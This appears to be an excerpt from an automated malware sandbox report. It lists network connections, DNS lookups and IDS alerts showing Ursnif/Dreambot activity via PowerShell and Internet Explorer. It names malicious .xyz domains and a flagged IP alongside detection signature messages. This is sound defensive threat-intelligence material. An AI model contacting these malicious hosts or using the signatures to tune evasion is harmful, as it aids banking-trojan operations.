2828 IEXPLORE.EXE 104.108.46.190:443 Akamai Technologies, Inc. NL whitelisted
2828 IEXPLORE.EXE 2.18.235.38:443 Akamai International B.V. –– whitelisted
2828 IEXPLORE.EXE 216.58.210.8:443 Google Inc. US whitelisted
2828 IEXPLORE.EXE 159.122.87.148:443 SoftLayer Technologies Inc. DE unknown
2828 IEXPLORE.EXE 147.75.83.123:443 Packet Host, Inc. US unknown
2828 IEXPLORE.EXE 216.58.208.46:443 Google Inc. US whitelisted
2828 IEXPLORE.EXE 77.88.21.119:443 YANDEX LLC RU whitelisted
2828 IEXPLORE.EXE 147.75.32.75:443 Packet Host, Inc. US unknown
1440 iexplore.exe 204.79.197.200:443 Microsoft Corporation US whitelisted
2828 IEXPLORE.EXE 172.217.16.142:443 Google Inc. US whitelisted
2828 IEXPLORE.EXE 172.217.21.206:443 Google Inc. US whitelisted
2828 IEXPLORE.EXE 104.108.59.193:443 Akamai Technologies, Inc. NL unknown
2828 IEXPLORE.EXE 66.102.1.155:443 Google Inc. US whitelisted
2640 IEXPLORE.EXE 85.143.217.238:80 Trader soft LLC RU malicious
1924 iexplore.exe 85.143.217.238:80 Trader soft LLC RU malicious

DNS requests

Domain IP Reputation
dx019xsl1pace.xyz 147.78.66.46 malicious
microsoft.com 40.113.200.201, 104.215.148.63, 13.77.161.179, 40.76.4.15, 40.112.72.205 whitelisted
www.microsoft.com 2.21.41.70 whitelisted
assets.onestore.ms 2.19.39.63 whitelisted
statics-uhf-wus.akamaized.net 2.16.186.32, 2.16.186.11 whitelisted
c.s-microsoft.com 2.18.233.62 whitelisted
ajax.aspnetcdn.com 152.199.19.160 whitelisted
img-prod-cms-rt-microsoft-com.akamaized.net 2.16.186.27, 2.16.186.40 whitelisted
api.bing.com 13.107.5.80 whitelisted
www.bing.com 204.79.197.200, 13.107.21.200 whitelisted
uhf.microsoft.com 2.18.232.244 whitelisted
iecvlist.microsoft.com 152.199.19.161 whitelisted
r20swj13mr.microsoft.com 152.199.19.161 whitelisted
avast.com 5.62.40.96, 5.62.42.77, 5.62.48.97 whitelisted
www.avast.com 104.108.46.190 whitelisted
static3.avast.com 2.18.235.38 whitelisted
www.googletagmanager.com 216.58.210.8 whitelisted
static.avast.com 2.18.235.38 whitelisted
dev.visualwebsiteoptimizer.com 159.122.87.148, 159.122.87.153 whitelisted
www.google-analytics.com 216.58.208.46 whitelisted
static.hotjar.com 147.75.83.123, 147.75.83.163, 147.75.204.174, 147.75.32.75, 147.75.204.150, 147.75.204.222, 147.75.84.99, 147.75.102.227 whitelisted
mc.yandex.ru 77.88.21.119, 87.250.250.119, 87.250.251.119, 93.158.134.119 whitelisted
script.hotjar.com 147.75.32.75, 147.75.83.125, 147.75.83.163, 147.75.204.222, 147.75.84.99, 147.75.204.150, 147.75.204.174, 147.75.102.227 whitelisted
ampcid.google.com 172.217.16.142 whitelisted
vars.hotjar.com 147.75.83.123, 147.75.83.163, 147.75.84.99, 147.75.204.210, 147.75.204.150, 147.75.204.174, 147.75.32.75, 147.75.204.222 whitelisted
ampcid.google.ie 172.217.21.206 whitelisted
t.av.st 104.108.59.193 unknown
stats.g.doubleclick.net 66.102.1.155, 66.102.1.154, 66.102.1.156, 66.102.1.157 whitelisted
nrosalynh.xyz 85.143.217.238 malicious

Threats

PID Process Class Message
2080 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] MalDoc Requesting Ursnif Payload
2080 powershell.exe Potentially Bad Traffic AV INFO HTTP Request to a *.xyz domain
2476 IEXPLORE.EXE A Network Trojan was detected MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2828 IEXPLORE.EXE A Network Trojan was detected MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2640 IEXPLORE.EXE A Network Trojan was detected MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2640 IEXPLORE.EXE Potentially Bad Traffic AV INFO HTTP Request to a *.xyz domain
1924 iexplore.exe Potentially Bad Traffic AV INFO HTTP Request to a *.xyz domain

Debug output strings

No debug info.